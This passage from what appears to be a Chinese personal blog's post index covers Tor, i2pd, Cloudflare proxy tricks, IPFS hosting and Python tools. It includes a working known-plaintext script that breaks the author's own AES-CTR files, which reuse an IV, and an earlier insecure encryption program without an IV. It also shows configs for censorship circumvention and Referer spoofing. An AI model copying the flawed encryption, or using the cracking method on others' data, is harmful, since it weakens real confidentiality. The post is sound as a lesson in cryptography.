算好喜欢的私钥之后，就可以进行建站了，他们这个配置文件感觉比Tor客户端的要好，配置也很简单，按照i2pd的文档就行了，不过他们这个有个缺点就是好像不支持Unix Domain Socket连接，这样我就得再占掉一个端口，比较令人遗憾……另外这个私钥官方没有说放到哪里，我找了一下，需要放到“/var/lib/i2pd/”路径下，这个应该是它以服务形式启动之后默认的工作目录。   配置好之后网站就可以访问了，不过既然它有域名解析系统，还是免费的，肯定还是要注册一个的。注册也很简单，上面提到的i2pd-tools里面有个regaddr程序，把自己想要的域名和私钥按照说明传进去，把输出的结果粘贴到 http://reg.i2p/add 或者 http://stats.i2p/i2p/addkey.html 里面，然后过段时间等他们收录了之后就可以使用了。感想虽然i2pd的体验还不错，不过也许是官方使用的是Java编写的客户端，导致用户量很少，网站也非常少，以致于感觉访问i2p的网站都似乎失去了意义……不像洋葱网络那样，随便搜一搜就能找到互联网肯定找不到的东西。 （所以Java什么时候死啊😂）" },{ "title": "Tor在服务器上的使用体验", "category": "", "tags": "tor, 网络", "url": "/2022/11/16/tor.html", "date": "2022/11/16", "content": "就像和普通网络一样使用Tor吧起因前段时间全世界最大的电子书图书馆——Zlibrary的域名被FBI回收了，以致于想要访问它只能用Tor（洋葱路由器）或者Tor2Web访问它的Onion域名。 （众所周知，只有恋童癖，瘾君子和读书人才会用Tor🤣） 当然，想要访问洋葱网络用Tor2Web最简单，但是最不安全，太容易被中间人攻击了，或者安装洋葱浏览器也很简单，只不过我有个理念就是一个设备不应该安装超过一个浏览器，正因如此，我也很不喜欢Electron的软件。既然我使用Windows本身就已经有个Egde浏览器了，我为什么还要安装其他浏览器呢？所以我就想能不能用更加简单的方式来访问Onion域名。探索过程要想不使用洋葱浏览器访问也可以，只要装一个Tor核心，然后让浏览器去连它的Socks代理就可以了，只不过……在国内想要连接洋葱网络实在是太麻烦了，还要整网桥（前置代理）啥的。不过要说代理……我自己倒是有一个，那这么说来我干脆把代理和Tor组合到一起都放到服务器上，然后我只要连代理就可以同时访问外网和洋葱网络了吧，还不影响我访问其他网站的速度。   那应该怎么做呢？Tor安装倒是很简单，大多数软件包管理器都能直接安装，甚至可以什么都不配置就可以用9050端口访问它的Socks5代理了，我的话虽然之前用的是wssocks，但是并发效果很差，也没有手机客户端，所以最后还是换成了v2ray。像v2ray这种相比其他的还有一个优点就是它的路由配置功能还挺强大的，这次也是用到了它的路由功能。其实去看官网文档上也有关于将Tor和v2ray配合使用的教程，只是不知道为什么它那个配置文件里面只有关于客户端的路由，没有服务端的路由……不过不影响，v2ray作为一个服务端和客户端等价的程序稍微改下那个配置文件就可以用了：{  \"log\": {    \"loglevel\": \"warning\"  },  \"routing\": {    \"domainStrategy\": \"AsIs\",    \"strategy\": \"rules\",    \"settings\": {      \"rules\": [        {          \"type\": \"field\",          \"domain\": [            \"regexp:\\\\.onion$\"          ],          \"outboundTag\": \"tor\"        },        {          \"type\": \"field\",          \"outboundTag\": \"block\",          \"protocol\": [            \"bittorrent\"          ]        }      ]    }  },  \"inbounds\": [    {      \"sniffing\": {        \"enabled\": true,        \"destOverride\": [          \"http\",          \"tls\"        ]      },      \"listen\": \"/dev/shm/proxy.sock\",      \"protocol\": \"vless\",      \"settings\": {        \"udp\": false,        \"clients\": [          {            \"id\": \"***\",            \"alterId\": 0,            \"flow\": \"\"          }        ],        \"decryption\": \"none\",        \"allowTransparent\": false      },      \"streamSettings\": {        \"network\": \"ws\",        \"security\": \"none\",        \"wsSettings\": {          \"path\": \"***\",          \"headers\": {            \"Host\": \"***\"          }        }      }    }  ],  \"outbounds\": [    {      \"protocol\": \"freedom\"    },    {      \"protocol\": \"socks\",      \"settings\": {        \"servers\": [          {            \"address\": \"127.0.0.1\",            \"port\": 9050          }        ]      },      \"tag\": \"tor\"    },    {      \"protocol\": \"blackhole\",      \"tag\": \"block\"    }  ]}顺便我为了避免不小心服务器被封也屏蔽了bt下载（其实也许把bt流量转发到洋葱网络里面也可以？）。配置好之后试着找了些Onion网站试了试，还不错，访问速度一般，也不影响我访问其他网站。   不过需要注意的一点是这个方法不能匿名，仅仅是作为访问Onion网站的手段，因为普通的浏览器不会有那么多保护隐私的机制，这样的配置方法很容易会导致IP泄露（就算是有代理也会有WebRTC泄露的可能性），想匿名还是用洋葱浏览器+前置代理或者Tor做透明代理会更好一些。使用Tor进行建站既然在服务器上安装了Tor，正好我之前用mkp224o算了几个vanity address，这次可以直接拿已经算好了私钥开网站。方法也很简单，在HiddenServiceDir后面加私钥的存放位置，然后在HiddenServicePort后面加想要服务的端口号和被映射的端口，一般教程会说用nginx映射127.0.0.1:80，而我会建议使用Unix domain Socket，更加安全，性能也会更好，像我就会配成：HiddenServiceDir /var/lib/tor/hidden_service/HiddenServicePort 80 unix:/dev/shm/nginx.sock顺便加两句反蜜罐配置：ExcludeNodes {cn},{hk},{mo},{kp},{ir},{sy},{pk},{cu},{vn}StrictNodes 1nginx的监听也要注意监听/dev/shm/nginx.sock，这样能保证即使在服务器内扫描端口也不会泄露你的网站😆。   其实我本来想让v2ray的连接Tor也通过Unix domain Socket走，但是很遗憾的是我没找到v2ray的Outbound怎么样设置Unix domain Socket连接……感想感觉洋葱网络其实还是对用户挺友好的，使用起来还是挺方便的，就像访问普通网络那样，大概也正是这种原因它才能成为匿名网络中最受欢迎的吧。" },{ "title": "提高Cloudflare站点在中国的体验", "category": "", "tags": "Cloudflare, 加速", "url": "/2022/11/08/cf-acc.html", "date": "2022/11/08", "content": "从此，Cloudflare不再是减速CDN了起因众所周知，因为很多人用Cloudflare当作梯子中转之类的原因，中国对Cloudflare网络的速度会有很大程度的劣化，所以在上面的网站访问速度也会非常烂。最近我发现了一个不错的办法可以在一定程度上避免这个问题，所以今天就来说一说。普通用户的解决方法对于网站的访问者来说，使用CloudflareSpeedTest这个工具就挺不错的，它能检测到当前网络连哪个IP是最好的。因为Cloudflare网络用的是Anycast，无论从哪个IP进入都可以，所以用这个检测出来的IP直接改Hosts访问就能解决访问网站慢的问题。   不过有些地区可能是服务商主动对Cloudflare的IP段进行限速，那这样有可能测试出来没有可以使用的节点，那么还有一种方法，网络上有些可能是企业之类的人会反代Cloudflare的网站用于解决在国内访问慢的问题，并且没有对host头做限制，那么这些第三方的节点同样也可以作为访问Cloudflare网站的方法。具体怎么找到这样的IP有一个仓库每天都会扫描全网去找像这样的节点。   当然这些节点也不是所有的IP从中国连接速度都很好，这时候可以把这个仓库的所有IP收集起来然后再丢给CloudflareSpeedTest去测试，具体我写了个简单的脚本来处理：git clone https://github.com/ip-scanner/cloudflare.gitcat cloudflare/*.txt > proxy.txt./CloudflareST -allip -sl 0.1 -f proxy.txt -n 500这样获得的第三方IP就基本上不会被限速，里面甚至有可能有通过IPLC或者IEPL的节点，包括拿来当梯子中转速度都几乎可以跑满带宽，另外还有一个优点是这样Cloudflare获得的IP就是第三方节点的IP，可以起到匿名的作用。对于站长的解决方法上面的方法相当于是用户自己去解决访问的问题，但是操作可能还是会有点复杂，所以对于网站站长来说不可能去期待访客通过这种方法来提高访问自己网站的速度。不过Cloudflare网站接入只能通过NS方式接入，这样接入的话域名解析的IP就是自动分配的，没办法自己设定解析，也就不能选择更合适的IP，另外之前用CF Partner通过CNAME接入的方法基本上都全死光了，那现在应该怎么办呢？后来我搜了一下，Cloudflare原来已经提供了官方通过CNAME接入的方法（应该是新加的功能），除了要绑信用卡之外就没别的要求了。   在使用这个功能之前，必须先有2个域名，一个是不重要的域名，通过NS方式接入Cloudflare，另一个是主要使用的域名，可以接到Cloudflare上，也可以接到别的NS服务商上。然后在那个不重要的域名中先设定好源站的解析，可以解析到“@”或者随便一个二级域名也可以，并且打开代理。然后点开SSL/TLS->自定义主机名，第一次使用需要绑定信用卡或者PayPal，好像是因为它是个什么预付费的项目，免费100个CNAME，超过100个每个0.1USD。打开以后在回退源中输入刚刚设置好解析的那个域名，当回退源状态显示有效后就可以添加自定义主机名了。这里添加的主机名就是主要使用的域名，输入后根据提示在主域名上设定好TXT记录，完成后只要看到刚刚设定的主机名后面跟了两个有效就可以了。   这样准备工作就做完了，现在只要把主域名的解析设定到Cloudflare网络的任意节点，它就会自动连接到不重要的域名所解析的IP上。至于怎么获得优秀的IP，就可以像普通用户那样操作了，获得优秀的IP以后我们就可以设定一个A记录解析过去。   不过这里需要注意一些地方，如果使用的优选IP是Cloudflare官方的IP，那基本上也不会有什么问题，只是这个IP可能有些地区还是会访问缓慢，毕竟它也算是在重点关注对象中。如果是选择第三方节点IP，大多数情况速度都能保障，但是有个很大的问题就是那些节点的主人如果发现了你在使用他们的节点，他们是可以很轻易的进行中间人攻击的，毕竟域名都解析过去了，整个SSL证书也很简单，为了能避免这个问题一定要开启“证书透明度监视”保证能在第一时间避免有人进行中间人攻击。另外还有一个问题就是既然第三方IP可以匿名，那么网站也没办法获取到用户的真实IP地址了，像Cloudflare一些根据IP的防火墙也会无法生效，像WAF中的速率限制规则是万万不能开的，开了很大可能网站就访问不了了。还有就是DDoS是可以击垮第三方节点的，可能会使网站的可用性下降。所以如果对速度没有特别在意的情况下还是解析到官方IP上更好一些。   所以为了避免节点可能会用不了的情况，我有个想法（因为我没有大陆地区的服务器所以只是设想），之前我用过一个可以给Cloudflare设定DDNS的脚本，叫cloudflare-api-v4-ddns，原本它是去请求获取本机IP的API设定解析的，那么如果把上面优选IP的结果输入到这个脚本中，放到国内的服务器上，每天自动执行一次，那这样我的网站不就会一直使用最优秀的IP了嘛，可惜我没有国内的服务器，改起来还要费点事就算了吧。感想有了很多辅助的工具，能让Cloudflare不再成为减速CDN，那它岂不是可以吊打国内其他CDN厂商了😆，果然还是良心厂商啊。" },{ "title": "在Web3上搭建一个自己的博客", "category": "", "tags": "Web3, 博客, 搭建", "url": "/2022/10/19/web3.html", "date": "2022/10/19", "content": "感觉Web3可以真正的为现在的人们使用了呢。起因最近偶然看到了一个很有意思的东西，叫xLog，大概试了试，这是在一条叫Crossbell的区块链上使用智能合约操作和存储元数据，并把实际数据存到IPFS上的项目。看了一眼还挺有意思，就在上面搭了一个自己的另一个博客，另外他们还使用这套方案写了一个类似Twitter的社交系统，也叫Crossbell，非常的人性化，可以说是把Web3真正的带给了普通用户。至于怎么搭他们的项目成员写了篇教程，5分钟就能搭好在Web3的博客。   不过使用xLog那就不是技术人员的事了，而是让一个不怎么懂电脑的人来做的事情了。另外他们宣称数据是“Permanently stored on the blockchain”这一点我不太认同，要是说存到了Web3成为了其他人无法修改的数据，这倒是没什么问题，但是存到IPFS上只要没有被Pin，就有可能在节点GC的过程中永远消失。另外我其实对区块链接触不多，不清楚能不能完整的同步他们的链，如果不能那就是私链了，那样元数据也不能永久保留了……所以我只能说这个平台是Web3，可以保证不因为审查而404，但是不能在时间的长河中保留信息。技术人员的方法所以作为技术人员，我的博客当然直接上IPFS那更好啦，因为他们的平台毕竟可定制性不高，而且好多组件不知道有没有可替代性，比如以太坊JSON-RPC，不过他们的服务好像是都开源了，只要这个链可以被同步，能搭属于自己的RPC那倒是问题不大。   直接用IPFS客户端直接上传是最原生的办法，但是我不喜欢在自己电脑上安一堆莫名其妙的软件，像我现在写博客都是直接在Github或者Gitlab上写好然后直接用之前提到的静态页面服务商一次性部署好。所以我也希望能有一个类似的服务商能帮我把我的博客上传到IPFS上。最后我找到的服务商就是4EVERLAND。它可以绑定Git仓库并监听变化，当有变化的时候就会自动部署到IPFS上，并且他们提供免费的Gateway来直接访问在IPFS上的内容，非常的不错。不过有个问题就是不知道什么原因，它的部署模板里面没有Jekyll的语句，然后前端还不能自定义……所以只能靠抓包的方式来修改成自己想要的部署语句。从IPFS直接访问使用4everland部署完之后直接访问当然也很好，但是总感觉和其他服务商差不多，谁知道它读取网页到底是从自己服务器上还是IPFS网络上读取呢？所以我还想整个更好的方式从IPFS上读取，也能证明它确实在IPFS上了。   直接通过Gateway去访问我的博客当然也没问题，但是每次部署的时候CID是会变化的，那这样我想访问也不方便啊……后来我听说可以把CID用一种叫dnslink的方式记录到DNS里，这样就能通过固定又好记的方式来访问。不过那时候我不知道怎么访问dnslink记录的网站……而且每次部署CID会变，那部署完我还要更新我的DNS记录啊？后来我查了查原来还有一种叫IPNS的东西，看了一眼4everland的控制台，原来每个网站它也会生成一个固定的IPNS，然后用dnslink可以指向IPNS。那如何访问呢？IPFS又没有一个IP地址，光TXT记录肯定不够的吧？后来我才知道原来要用CNAME解析到Gateway才能访问，设置之后每次访问Gateway就会自动解析在TXT记录里的dnslink了。现在 https://ipfs.mayx.eu.org 这个网站就可以直接访问我博客在IPFS上的数据了。这不比xLog自由度高？不过我这个没办法存评论数据，可能xLog的特色就是社交吧，毕竟他们的主项目Crossbell就是主打的社交。希望可以整一个单独的插件，专门用他们的网络来为我这种静态博客提供评论功能，也是一个不错的选择（毕竟ETH公链上的手续费太贵啦😂）。更好的永久存储前面我说过，IPFS只能防止篡改，但不是作为永久存储的方案，上公链当然是也一种永久存储的方案但是成本太高了我付不起。后来我了解到一种叫做Arweave的东西可以永久存储你的数据，不过这不是免费的，想存得要付AR币到链上才可以。还好4EVERLAND提供了一些免费上传到AR网络的额度，非常的不错，这样我以后每次上传我会把地址写到Github的Releases里面，进一步的提高我博客永久存储的可能性。   另外我还听说似乎还有一种叫做ZeroNet的东西也是通过分布式的方式存储数据，据群友所说也能在一定程度上永久存储。不过我试了试访问实在是太困难了😂，而且现在程序也不在维护了，所以也就放弃了。感想Web3真是发展的越来越好了，希望能有更多的人参与其中，一起创建不受管束的网络吧。（还有实现我的Mayx Forever计划😝）   不过说来我也挺担心那个Crossbell的项目，作为不受监管的平台只要知名度上来肯定会被滥用到死，希望他们能活得更长一些吧。" },{ "title": "如何破解我上次写的加密程序？", "category": "", "tags": "Python, 加密, 破解", "url": "/2022/10/14/crack-aes.html", "date": "2022/10/14", "content": "不按规则使用加密算法是非常不安全的！起因前几天我用Python写了一个很简单的加密程序，用的是tinyaes提供的AES-128-CTR加密方式，然后因为嫌麻烦没有整iv。最近几天我一直在搜关于AES中关于iv的信息，我一直没想明白那个iv到底是干啥用的。   在我看了几天那些关于AES的5种加密模式之后，关于ECB和CBC的加密模式讲的很多，而对其他加密模式讲的很不清楚……但唯一写的很清楚的就是ECB很不安全，重复使用相同的密钥和iv加密数据很不安全，尤其是CTR模式，直接完全丧失了机密性😂，这不是在完全否定我前几天写的东西嘛，然而除了这些就再没有写别的了……那它到底是怎么个丧失了机密性啊，又不说清楚，所以就只好我自己想了😓。探索首先我先看了看AES中5种加密模式的区别，发现CTR模式和其他模式有个不同的地方是它加密的是密码，而不是数据，它是把密码和iv通过AES加密算法加密之后把获得的东西和明文数据异或后来得到密文的，怪不得它可以加密和解密用相同的方法，原来它真的就是异或加密啊😂，那异或加密安全吗？我在网上也搜了搜，很多人说这是一种非常不安全的加密方式，只有不懂的人和刚入门密码学的人才会用，巧了，我就是不懂密码学的人😂，然而异或加密又怎么不安全网上又不说……我真的是无语了。   不说我就只能自己想了……首先，他们说CTR不安全的加密仅限于相同的iv和密码去加密不同的数据，而加密的方式是通过异或，那么我们先这样去算一下：   K = AES(key, iv)   C1 = K xor P1  C2 = K xor P2  其中K是用AES加密密码和iv获得的值，C代表密文，P代表明文。然后想着想着，如果用C1 xor C2会怎么样呢？最终用异或运算律算了一下，大概明白了为什么它不安全了，因为：   C1 xor C2 = P1 xor P2   我们知道，在这种情况下假如你用P1或P2去异或上面式子得到的值，那你就能得到另一个明文，也就是：   (C1 xor C2) xor P1 = P2   这样你只要知道一组用这个密钥加密的密文和明文，就能破解所有其他密文了！   于是根据这个原理我试着用Python写了一个根据已知明文密文对获得密文的程序出来：import sysif not len(sys.argv) == 4:    exit(f\"Usage: {sys.argv[0]} [enc_file1] [enc_file2] [plain_file2]\")with open(sys.argv[1], \"rb\") as enc_file1:    with open(sys.argv[2], \"rb\") as enc_file2:        with open(sys.argv[3], \"rb\") as plain_file2:            with open(sys.argv[1] + \".crack\", \"wb\") as crack_file1:                crack_file1.write(bytes(a ^ b for (a, b) in zip(bytes(a ^ b for (a, b) in zip(enc_file1.read(), enc_file2.read())), plain_file2.read())))写完之后发现和加密的程序用了一样多的行数😂，试了一下，真的可以获得另外密文的对应的明文！而且是在不需要知道密码的情况，不过我不知道是我程序写的有问题还是推算的有问题，当想要破解的文件长度比已知明文密文的文件长时，破解出来的明文就只能破解到和已知明文密文一样长的位置……总之能证明之前写的加密确实“完全丧失了机密性”就行了。解决办法为了弥补上一篇文章写的加密程序所遇到的问题，这次我还是乖乖的按照官方说明使用iv吧，根据这个原理我重新写了一下我的程序：import hashlib, tinyaes, sys, osif not len(sys.argv) == 3:    exit(f\"Usage: {sys.argv[0]} [filepath] [key]\")enc = Falseif len(sys.argv[1]) > 4:    if sys.argv[1][-4:] == \".enc\":        enc = Truewith open(sys.argv[1], 'rb') as orig:    iv = os.urandom(16)    key = tinyaes.AES(hashlib.md5(sys.argv[2].encode()).digest(), orig.read(16) if enc else iv)    with open(sys.argv[1][:-4] if enc else sys.argv[1] + \".enc\", 'wb') as targetfile:        if not enc:            targetfile.write(iv)        for byte_block in iter(lambda: orig.read(4096), b''):            targetfile.write(key.CTR_xcrypt_buffer(byte_block))这次我把随机生成的iv存到了文件的开头，不过也正是如此，我没办法用完全相同的办法去进行加密和解密了……所以用了.enc后缀名作为明文和密文的区分。还有程序的行数几乎增加了一倍😂。感想看来对于不太了解的学科还是好好的按照人家说明书上写的做比较好，不然不懂装懂就会达不到预期的想法了。" },{ "title": "用Python写一个超简单的加密程序", "category": "", "tags": "Python, 加密", "url": "/2022/10/08/tinyaes.html", "date": "2022/10/08", "content": "有些冷门的库也许更容易解决问题起因最近在写Python脚本的时候遇到一个问题，就是怎么样轻松的加密一串字符。在网上随便一搜大都是介绍的使用比如pycryptodome或者cryptography库进行加密，我以前写的一个加密传输Demo作业的时候就用过。不过现在总感觉看着很难受，倒不是说有多复杂，主要是这些库的算法太多了，什么AES，RSA啥的都有，而且还有一堆乱七八糟的参数，我用的时候还要去思考到底用哪个算法比较好，还要考虑有些有什么向量之类乱七八糟的。但是很多时候我只是单纯要个加密，不想去考虑这些乱七八糟的东西，那我应该怎么做比较好呢？探索这时候我想起来我以前用的Pyinstaller库如果想要使用Key参数的时候会要求安装一个叫做tinyaes的库，我搜了一下这个库，网上几乎没有对这个库的介绍，没办法就只好去Github找找它源代码的仓库。去看了一眼说了跟没说一样，就几句话连个示例也没有的……不过大概意思就是C也有个叫tiny-AES-c的库，它是在Python上对这个库做的一个简单的包装，但那个仓库里面也没有示例😂……还好tinyaes仓库里面有个测试脚本，我看了一眼又回去看了看C的库那个文档，结合“Same function for encrypting as for decrypting in CTR mode”这句话我才明白，这个tinyaes原来就用一个方法就能进行加解密了！怪不得叫“xcrypt”，就像xor加密那样，用同样的方法就可以做到加密和解密，这个仓库加密的算法是AES-128-CTR，这样我也不用费心考虑到底选什么加密算法了，使用也非常简单，非常的符合我的需求啊，可惜就是这个库不怎么出名，100个⭐都不到。使用方法tinyaes的使用方法非常简单，一句话就可以搞定，而且加密和解密的代码完全一致：__import__(\"tinyaes\").AES(b\"十六位的密码\", b\"十六位的向量，可以不要\").CTR_xcrypt_buffer(b\"需要加密/解密的内容\")使用起来非常的简单啊，就是密码要求必须是16位的……那我要是想要一个随意位数的密码怎么办呢？我想起来MD5的hash长度好像就是16位的，所以如果想要其他位数的密码就用MD5哈希之后再用吧。示例既然使用方法如此简单，我估摸了一下，如果写一个加密文件的小程序估计用不了10行，用其他的加密库我估计应该做不到吧，所以说就随手写了一个试试看，果然不到10行就写了出来，看起来非常不错。import hashlib, tinyaes, sysif not len(sys.argv) == 3:    exit(f\"Usage: {sys.argv[0]} [filepath] [key]\")key = tinyaes.AES(hashlib.md5(sys.argv[2].encode()).digest())with open(sys.argv[1], 'rb') as orig:    with open(sys.argv[1] + \".xc\", 'wb') as enc:        for byte_block in iter(lambda: orig.read(4096), b''):            enc.write(key.CTR_xcrypt_buffer(byte_block))用法很简单，比如我给这个脚本起名叫“encrypt_file.py”，我想加密就可以直接输入python3 encrypt_file.py 要加密的文件.txt 密码就可以了，执行完之后会生成一个“.xc”为后缀的文件，解密也一样，输入python3 encrypt_file.py 要加密的文件.txt.xc 密码就OK了，不过因为我这个程序并不能判断一个文件有没有加密，所以解密的时候就会给后缀再加一个“.xc”，这时候就只能手动把它去掉了。如果密码不正确，那就相当于二次加密了，解密就要按顺序依次反过来执行，很有意思。感想这样的库我感觉更符合Pythonic，用什么pycryptodome或者cryptography库写的就感觉像是Java程序那样臃肿，这种程序感觉就很直观，不用考虑那么多奇怪的东西。" },{ "title": "Cloudflare规则新功能体验", "category": "", "tags": "Cloudflare, 规则, 功能", "url": "/2022/10/05/rules.html", "date": "2022/10/05", "content": "Cloudflare真是良心，为广大站长节约了无数成本！♥起因之前登录到Cloudflare的时候看规则的时候发现了一些新功能，现在好像增加了什么转换规则，动态重定向啥的。看到之后好像还挺有意思，就试用了一下。用了一下之后发现还真不错，功能很强大，而且还免费。所以这次想说说关于Cloudflare规则新出的几个功能体验。使用体验为了更好的描述，我就直接用实例说明了。二级域名重定向到用户页面之前Telegram出了个新功能，可以直接用二级域名作为自己的Telegram名片，比如我的用户名是unmayx，在Telegram上就是 https://unmayx.t.me/ 。这个功能看起来还挺有意思的，所以我也想给自己的网站整一个。其实这个东西如果说自己的网站没有二级域名，直接用页面规则就可以做出来，这个功能能实现也是多亏了Cloudflare愿意让免费用户使用泛解析的代理，真是太良心了😭。首先在解析里加一条泛解析，A或者CNAME都行，目标也可以随便填。然后在页面规则里加一条URL为*.example.com/*这样的地址，具体域名写自己的就行，然后设置为转发URL，状态代码301或者302都行，目标URL填类似于https://example.com/username-$1.html，具体规则根据自己网站来，像Telegram那样的规则就可以填https://t.me/$1这样子 （当然Telegram不可能用Cloudflare的CDN啦🤣） 。   不过这样设定有个问题，大多数网站不会只有一级域名，如果有二级域名而且也用了Cloudflare CDN会和规则冲突导致优先匹配规则。Cloudflare原来的页面规则比较拉跨的地方就是除了匹配URL没有别的可以操作的地方，像我要不匹配某个东西也没办法做到。还好新出的动态重定向有这样的功能，它可以匹配一串东西，比如我要不匹配某个地址，比如www开头的我可以写not starts_with(http.host, \"www.\")，反正Cloudflare的证书也没法用在三级以上的域名，这样匹配也没啥问题。另外还要除了自己，所以最终写成(not starts_with(http.host, \"www.\") and http.host ne \"example.com\")就可以啦，接下来就是写动态重定向到哪里了。我翻了半天文档发现除非用正则表达式，否则没有办法单独把http.host中“.”前面的东西取出来，然而正则功能不是免费的😂。   但是之前用页面规则的时候也没有这个问题啊，怎么这个新功能还有这种问题……不过既然页面规则支持这个功能那我们就可以把两个结合一下，先用动态重定向接收，然后发给页面规则处理就好啦，所以我们可以把刚刚动态重定向的表达式写成一个和现有网站不冲突的地址，比如concat(\"https://example.com/user/\", http.host, \"/\")，这时候它会先重定向到一级域名的某个位置，然后用页面规则接收一下，URL设定为example.com/user/*.example.com/，然后目标URL设定为https://example.com/username-$1.html就可以啦。Pixiv图片反代之前我也有搭过Pixiv的图片反代，是学着Pixiv圖片代理的教程搭的，用的是Cloudflare Workers，不过我大概看了下代码其实我们的主要目的只是想让服务器收到可以用的Referer嘛，正好这个新出的转换规则就挺不错的，可以重写URL、请求头和响应头，那么我们这次的需求就是把请求Pixiv图片服务器的请求头改掉吧，那么我们就首先给自己的域名加一条指向i.pximg.net的CNAME解析，像我整的就是 https://pixiv.mayx.eu.org ，然后添加一条修改请求头的转换规则，内容就写当(http.host eq \"pixiv.mayx.eu.org\")时，将Referer设定为 https://www.pixiv.net/ 就好啦（实际上好像是只要包含pixiv字样就可以）。   为了让它能发挥更大的用处，我想起来我以前写的发图微信机器人，这次我想整个直接在Web界面就可以用的，于是Viewer就诞生了，而且用的就是我新设定的反代，相比原来的Workers反代不仅没有了请求次数限制，而且还可以设定页面规则来设置更长时间的缓存，来达到更快的速度。Iwara下载地址解析与DNS解析看着这个规则我就又想起来了高中的时候写的Iwara Viewer，因为跨域我不能直接用Web调用Iwara的API，而且当时主要是为了给服务器获取下载地址。现在我既然可以用转换规则改响应头，那相应的我就可以加一个Access-Control-Allow-Origin: *了吧，那这样我也可以用前端去直接调用Iwara的API了吧，所以我简单写了一个Iwara Downloader，因为对JavaScript不是特别熟悉，而且Iwara的目录老是出问题，所以就懒得写Viewer了。现在只要把Iwara的地址粘到输入框里，比如OBSERVATION DIARY，就可以获取到这个视频的下载地址。不过这个东西确实有点鸡肋了😂，毕竟Iwara又不是不给你下载地址。   其实我写这个还有个想法就是做在国内下载的加速器，但是那个防盗链实在是整的让人难受，它的Hash目前来看好像是由文件名，Host，过期时间和访问者IP四个值算出来的（有没有更多的我也不清楚），我要是修改了这四个中的任意一项就会403，然而Iwara的域名又被DNS污染了，首先先解决这个问题吧，Cloudflare能代理除了它本身的其他不检查Host的网站，我想了想可以反代Google DNS的DoH，这样我就可以获取到下载地址的真实IP了（顺便dns.mayx.eu.org就相当于我的DoH了）。不过获取到了也没什么用😂，如果改hosts会发现有SNI RST，直接用IP访问防盗链会检查Host字段，我也想过要不然把下载的地址再反代一下？不过因为会检查Host，那个转换规则又不能改Host，所以没办法，就先写这么个东西吧。感想Cloudflare真是良心啊，其他就算是付费CDN可能都没有这么多功能吧，而且还抗打。不过限制还是比较多的，要是能像Nginx那样随意配置该多好啊😂，不过想想也不可能，真那样估计就被大规模滥用了。" },{ "title": "使用Python制作可热载的定时调度器", "category": "", "tags": "Python, 程序, 标志", "url": "/2022/09/21/cron.html", "date": "2022/09/21", "content": "定时任务用CRON难道不够吗？起因最近因为写的Python脚本比较多，另外也有好多脚本都是定时运行的脚本，然后Linux自带的CRON可能不是很直观，不然为什么那么多人开发CRON表达式生成器😂，另外CRON不能和脚本绑定到一起，也不能在Windows上使用，所以就想用Python来实现一个。   当然如果只是想用Python为一个程序做一个定时任务还是很简单的，不想用CRON也能直接用一个死循环if判断时间来做，比如想要每小时什么时候执行，那就不停的判断，直到那个时间到了以后然后去执行就好了。不过很多个脚本都用这种方法的话就显得太凌乱了，想要停止哪个脚本还不太好整，所以写一个定时调度器来统一管理所有的定时脚本也许会更好一些。探索过程其实我最开始是想着把CRON表达式放到脚本里，然后让管理器像配置文件那样读取它，不过我自己解析CRON表达式有点麻烦，一时也没找到好的办法。不过在找这个东西的时候找到了一个有意思的库，叫做schedule，用pip就能安装。它可以用类似自然语言的语法结构去写定时语句，看起来很有意思，于是我就打算用这个库来写我的调度器。   写它不算很复杂，这个库还是挺方便理解的，比据说Python常用的什么APScheduler那个库好用多了，那个玩意看着就不怎么人性化。功能很快就写好了，但是有个问题，就是既然我要写一个可以热载（自动重加载）的调度器，用什么办法监视文件比较好呢？最开始我实现的时候是想着用列出目录和stat方法来读取文件的元数据，然后轮询，如果内容有变化就进行重载。不过这样写起来也麻烦，准确来说也不算准确，而且性能也不怎么好，还要轮询，文件一多整个程序的执行效率就会变低。然后我想着之前我用的Django好像就有这样的功能，它到底用的是什么方法呢？一般我们运行Django项目的时候它第一句会写“Watching for file changes with StatReloader”，那看来StatReloader就是它用来监视文件的模块，听这名字怎么和我之前想的差不多😂，另外也没有找到叫这个名字的库，所以就算了，我还是搜一下找找别的库吧。后来我找到了一个看起来不错的库，叫做watchdog，看起来好像用法也不算很复杂，而且据说是用的内核的什么东西来监测，性能比轮询好很多，所以我就整了这个库，感觉效果还不错，可靠性也很好，文件一有修改程序就会检测到然后进行重载。代码管理器import threadingimport timeimport scheduleimport osimport importlibfrom watchdog.observers import Observerfrom watchdog.events import *reload_status = [0]def run_threaded(job_func):    job_thread = threading.Thread(target=job_func)    job_thread.start()    class FileEventHandler(FileSystemEventHandler):    def __init__(self, reload_status):        self.reload_status = reload_status        def on_any_event(self, event):        if not event.is_directory:            self.reload_status[0] = 1observer = Observer()event_handler = FileEventHandler(reload_status)observer.schedule(event_handler, \"tasks\", recursive=False)observer.start()while True:    reload_status[0] = 0    taskList = os.listdir(\"tasks\")    for task in taskList:        if \"__\" in task or task.rsplit(\".\", 1)[-1] != \"py\":            continue        try:            importlib.reload(importlib.import_module(\"tasks.\" + task.split(\".\")[0])).run(run_threaded, schedule)        except:            print(f\"Task {task.split('.')[0]} import failure\")    while True:        if reload_status[0]:            print(\"Task change, reloading...\")            time.sleep(1)            schedule.clear()            break        else:            schedule.run_pending()        time.sleep(1)被管理脚本示例def run(run_threaded, schedule):    schedule.every().second.do(run_threaded, job)def job():    print(\"The job is running.\")注：脚本应该放到管理器所在文件夹下的“tasks”文件夹，具体定时的写法可以看看schedule官方示例。感想感觉程序果然还是写的越简单越好，功能也是越单一越好。据说APScheduler是用Python实现的像Java的Quartz那样的东西，看着就很难受，像我这个50行写的管理器看起来还挺不错的吧😁。" },{ "title": "制作程序运行提示标志的历程", "category": "", "tags": "Python, 程序, 标志", "url": "/2022/09/05/trayicon.html", "date": "2022/09/05", "content": "有图形界面的程序可真是难做啊……起因最近我做了一个程序，类似于守护进程那样的一个用Python制作的脚本。脚本做出来很简单，可是我做出来之后需要向其他人证明我做的脚本正在运行，而且是给一个不懂电脑的人知道。在这个前提下我不可能让其他人去看任务管理器、或者执行ps -ef | grep xxx这种东西吧。所以还是得让它在运行的时候在桌面这样的图形界面显示一些东西才行。制作的历程使用托盘区图标像一般的后台程序证明自己存在的方式就是任务栏的托盘区显示一个图标。于是首先我就按照这个想法先用PyQt5然后在网上找了一段代码然后自己改了改：使用PyQt5库实现import sysfrom PyQt5 import QtCore, QtGui, QtWidgetsfrom threading import Threadclass SystemTrayIcon(QtWidgets.QSystemTrayIcon):    def __init__(self, icon, parent=None):        QtWidgets.QSystemTrayIcon.__init__(self, icon, parent)app = QtWidgets.QApplication(sys.argv)w = QtWidgets.QWidget()trayIcon = 